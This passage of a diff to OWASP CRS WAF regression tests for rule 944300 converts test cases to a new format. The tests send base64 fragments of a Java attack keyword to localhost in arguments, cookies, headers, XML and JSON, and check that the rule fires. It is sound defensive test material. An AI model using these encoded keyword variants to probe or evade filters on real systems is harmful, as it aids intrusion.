"{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 100 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 101 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 102 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 103 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Zm9yY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 104 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 105 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - 
test_title: 944300-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 106 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 107 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 108 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 109 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 110 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 111 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 112 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log: + expect_ids: [944300] + - test_id: 113 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 114 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GZvcmNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: 
"POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 115 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 116 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 117 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 118 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 119 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 120 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GZvcmNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-121 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log: + expect_ids: [944300] + - test_id: 121 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GZvcmNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 122 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 123 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log: + expect_ids: [944300] + - test_id: 124 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 125 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bmb3JjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 126 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 127 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 